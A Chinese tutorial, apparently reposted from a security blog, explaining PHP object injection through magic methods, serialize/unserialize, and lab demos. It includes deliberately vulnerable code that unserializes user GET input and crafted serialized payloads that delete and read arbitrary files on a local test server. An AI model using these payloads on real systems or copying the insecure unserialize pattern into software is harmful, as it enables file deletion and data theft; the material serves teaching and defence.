理解php反序列化漏洞

php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。为了理解这个漏洞,请读者具备基础的php知识。类和变量是非常容易理解的php概念。举个例子,1.php在一个类中定义了一个变量和一个方法。它创建了一个对象并且调用了PrintVariable函数,该函数会输出变量variable。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. class TestClass    
  4. {    
  5.     // 一个变量    
  6.      
  7.     public $variable = 'This is a string';    
  8.      
  9.     // 一个简单的方法    
  10.      
  11.     public function PrintVariable()    
  12.     {    
  13.         echo $this->variable;    
  14.     }    
  15. }    
  16.      
  17. // 创建一个对象    
  18.      
  19. $object = new TestClass();    
  20.      
  21. // 调用一个方法    
  22.      
  23. $object->PrintVariable();    
  24.      
  25. ?>   

 

php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用,比如__construct当一个对象创建时被调用,__destruct当一个对象销毁时被调用,__toString当一个对象被当作一个字符串使用。为了更好的理解magic方法是如何工作的,在2.php中增加了三个magic方法,__construct, __destruct和__toString。可以看出,__construct在对象创建时调用,__destruct在php脚本结束时调用,__toString在对象被当作一个字符串使用时调用。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. class TestClass    
  4. {    
  5.     // 一个变量    
  6.      
  7.     public $variable = 'This is a string';    
  8.      
  9.     // 一个简单的方法    
  10.      
  11.     public function PrintVariable()    
  12.     {    
  13.         echo $this->variable . '<br />';    
  14.     }    
  15.      
  16.     // Constructor    
  17.      
  18.     public function __construct()    
  19.     {    
  20.         echo '__construct <br />';    
  21.     }    
  22.      
  23.     // Destructor    
  24.      
  25.     public function __destruct()    
  26.     {    
  27.         echo '__destruct <br />';    
  28.     }    
  29.      
  30.     // Call    
  31.      
  32.     public function __toString()    
  33.     {    
  34.         return '__toString<br />';    
  35.     }    
  36. }    
  37.      
  38. // 创建一个对象    
  39. //  __construct会被调用    
  40.      
  41. $object = new TestClass();    
  42.      
  43. // 创建一个方法     
  44.      
  45. $object->PrintVariable();    
  46.      
  47. // 对象被当作一个字符串    
  48. //  __toString会被调用    
  49.      
  50. echo $object;    
  51.      
  52. // End of PHP script    
  53. // 脚本结束__destruct会被调用    
  54.      
  55. ?>   

php允许保存一个对象方便以后重用,这个过程被称为序列化。为什么要有序列化这种机制呢?在传递变量的过程中,有可能遇到变量值要跨脚本文件传递的过程。试想,如果为一个脚本中想要调用之前一个脚本的变量,但是前一个脚本已经执行完毕,所有的变量和内容释放掉了,我们要如何操作呢?难道要前一个脚本不断的循环,等待后面脚本调用?这肯定是不现实的。serialize和unserialize就是用来解决这一问题的。serialize可以将变量转换为字符串并且在转换中可以保存当前变量的值;unserialize则可以将serialize生成的字符串变换回变量。让我们在3.php中添加序列化的例子,看看php对象序列化之后的格式。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. // 某类    
  4.      
  5. class User    
  6. {    
  7.     // 类数据    
  8.      
  9.     public $age = 0;    
  10.     public $name = '';    
  11.      
  12.     // 输出数据    
  13.      
  14.     public function PrintData()    
  15.     {    
  16.         echo 'User ' . $this->name . ' is ' . $this->age    
  17.              . ' years old. <br />';    
  18.     }    
  19. }    
  20.      
  21. // 创建一个对象    
  22.      
  23. $usr = new User();    
  24.      
  25. // 设置数据    
  26.      
  27. $usr->age = 20;    
  28. $usr->name = 'John';    
  29.      
  30. // 输出数据    
  31.      
  32. $usr->PrintData();    
  33.      
  34. // 输出序列化之后的数据    
  35.      
  36. echo serialize($usr);    
  37.      
  38. ?>   

为了使用这个对象,在4.php中用unserialize重建对象。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. // 某类    
  4.      
  5. class User    
  6. {    
  7.     // Class data    
  8.      
  9.     public $age = 0;    
  10.     public $name = '';    
  11.      
  12.     // Print data    
  13.      
  14.     public function PrintData()    
  15.     {    
  16.         echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';    
  17.     }    
  18. }    
  19.      
  20. // 重建对象    
  21.      
  22. $usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');    
  23.      
  24. // 调用PrintData 输出数据    
  25.      
  26. $usr->PrintData();    
  27.      
  28. ?>   

magic函数__construct和__destruct会在对象创建或者销毁时自动调用;__sleep magic方法在一个对象被序列化的时候调用;__wakeup magic方法在一个对象被反序列化的时候调用。在5.php中添加这几个magic函数的例子。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. class Test    
  4. {    
  5.     public $variable = 'BUZZ';    
  6.     public $variable2 = 'OTHER';    
  7.      
  8.     public function PrintVariable()    
  9.     {    
  10.         echo $this->variable . '<br />';    
  11.     }    
  12.      
  13.     public function __construct()    
  14.     {    
  15.         echo '__construct<br />';    
  16.     }    
  17.      
  18.     public function __destruct()    
  19.     {    
  20.         echo '__destruct<br />';    
  21.     }    
  22.      
  23.     public function __wakeup()    
  24.     {    
  25.         echo '__wakeup<br />';    
  26.     }    
  27.      
  28.     public function __sleep()    
  29.     {    
  30.         echo '__sleep<br />';    
  31.      
  32.         return array('variable', 'variable2');    
  33.     }    
  34. }    
  35.      
  36. // 创建对象调用__construct  
  37.      
  38. $obj = new Test();    
  39.      
  40. // 序列化对象调用__sleep    
  41.      
  42. $serialized = serialize($obj);    
  43.      
  44. // 输出序列化后的字符串    
  45.      
  46. print 'Serialized: ' . $serialized . '<br />';    
  47.      
  48. // 重建对象调用__wakeup    
  49.      
  50. $obj2 = unserialize($serialized);    
  51.      
  52. // 调用PintVariable输出数据   
  53.      
  54. $obj2->PrintVariable();    
  55.      
  56. // 脚本结束调用__destruct     
  57.      
  58. ?>   


现在我们了解序列化是如何工作的,但是我们如何利用它呢?有多种可能的方法,取决于应用程序、可用的类和magic函数。记住,序列化对象包含攻击者控制的对象值。你可能在Web应用程序源代码中找到一个定义__wakeup或__destruct的类,这些函数会影响Web应用程序。例如,我们可能会找到一个临时将日志存储到文件中的类。当销毁时对象可能不再需要日志文件并将其删除。把下面这段代码保存为logfile.php。

[php]  view plain  copy
 
  1. <?php     
  2.      
  3. class LogFile    
  4. {    
  5.     // log文件名    
  6.      
  7.     public $filename = 'error.log';    
  8.      
  9.     // 储存日志文件    
  10.      
  11.     public function LogData($text)    
  12.     {    
  13.         echo 'Log some data: ' . $text . '<br />';    
  14.         file_put_contents($this->filename, $text, FILE_APPEND);    
  15.     }    
  16.      
  17.     // 删除日志文件    
  18.      
  19.     public function __destruct()    
  20.     {    
  21.         echo '__destruct deletes "' . $this->filename . '" file. <br />';    
  22.         unlink(dirname(__FILE__) . '/' . $this->filename);    
  23.     }    
  24. }    
  25.      
  26. ?>   

这是一个使用它的例子。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. include 'logfile.php';    
  4.      
  5. // 创建一个对象    
  6.      
  7. $obj = new LogFile();    
  8.      
  9. // 设置文件名和要储存的日志数据    
  10.      
  11. $obj->filename = 'somefile.log';    
  12. $obj->LogData('Test');    
  13.      
  14. // 脚本结束__destruct被调用somefile.log文件被删除  
  15.      
  16. ?>   

在其它脚本中我们可能找到一个unserialize的调用,并且参数是用户提供的。把下面这段代码保存为test.php。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. include 'logfile.php';    
  4.      
  5. // ... 一些使用LogFile类的代码...    
  6.      
  7. // 简单的类定义    
  8.      
  9. class User    
  10. {    
  11.     // 类数据    
  12.      
  13.     public $age = 0;    
  14.     public $name = '';    
  15.      
  16.     // 输出数据    
  17.      
  18.     public function PrintData()    
  19.     {    
  20.         echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';    
  21.     }    
  22. }    
  23.      
  24. // 重建用户输入的数据    
  25.      
  26. $usr = unserialize($_GET['usr_serialized']);    
  27.      
  28. ?>   

创建利用代码111.php。

[php]  view plain  copy
 
  1. <?php    
  2.   
  3. include 'logfile.php';    
  4.   
  5. $obj = new LogFile();    
  6. $obj->filename = '1.php';    
  7.      
  8. echo serialize($obj) . '<br />';    
  9.      
  10. ?>   

访问http://192.168.153.138/test.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:5:"1.php";}。

显示已经删除了1.php。验证一下,果然成功删除了。

这就是漏洞名称的由来:在变量可控并且进行了unserialize操作的地方注入序列化对象,实现代码执行或者其它坑爹的行为。先不谈 __wakeup 和 __destruct,还有一些很常见的注入点允许你利用这个类型的漏洞,一切都是取决于程序逻辑。举个例子,某用户类定义了一个__toString为了让应用程序能够将类作为一个字符串输出(echo $obj),而且其他类也可能定义了一个类允许__toString读取某个文件。把下面这段代码保存为test.php。

[php]  view plain  copy
 
  1. <?php     
  2.      
  3. // … 一些include ...    
  4.      
  5. class FileClass    
  6. {    
  7.     // 文件名    
  8.      
  9.     public $filename = 'error.log';    
  10.      
  11.     // 当对象被作为一个字符串会读取这个文件    
  12.      
  13.     public function __toString()    
  14.     {    
  15.         return file_get_contents($this->filename);    
  16.     }    
  17. }    
  18.      
  19. // Main User class    
  20.      
  21. class User    
  22. {    
  23.     // Class data    
  24.      
  25.     public $age = 0;    
  26.     public $name = '';    
  27.      
  28.     // 允许对象作为一个字符串输出上面的data    
  29.      
  30.     public function __toString()    
  31.     {    
  32.         return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';    
  33.     }    
  34. }    
  35.      
  36. // 用户可控    
  37.      
  38. $obj = unserialize($_GET['usr_serialized']);    
  39.      
  40. // 输出__toString    
  41.      
  42. echo $obj;    
  43.      
  44. ?>   

访问http://192.168.153.138/test.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}。

 

但是如果我们用序列化调用FileClass呢?先建立一个1.txt。

创建利用代码123.php。

[php]  view plain  copy
 
  1. <?php    
  2.    
  3. include 'test.php';    
  4. $fileobj = new FileClass();    
  5. $fileobj->filename = '1.txt';    
  6.      
  7. echo serialize($fileobj);    
  8.      
  9. ?>   

访问http://192.168.153.138/test.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:5:"1.txt";}。

成功显示了文本内容。也可以使用其他magic函数:如果对象将调用一个不存在的函数__call将被调用;如果对象试图访问不存在的类变量__get和__set将被调用。但是利用这种漏洞并不局限于magic函数,在普通的函数上也可以采取相同的思路。例如User类可能定义一个get方法来查找和打印一些用户数据,但是其他类可能定义一个从数据库获取数据的get方法,这从而会导致SQL注入漏洞。set或write方法会将数据写入任意文件,可以利用它获得远程代码执行。唯一的技术问题是注入点可用的类,但是一些框架或脚本具有自动加载的功能。最大的问题在于人:理解应用程序以能够利用这种类型的漏洞,因为它可能需要大量的时间来阅读和理解代码。
原文地址:https://securitycafe.ro/2015/01/05/understanding-php-object-injection/

转载于:https://www.cnblogs.com/gongchixin/articles/8108957.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值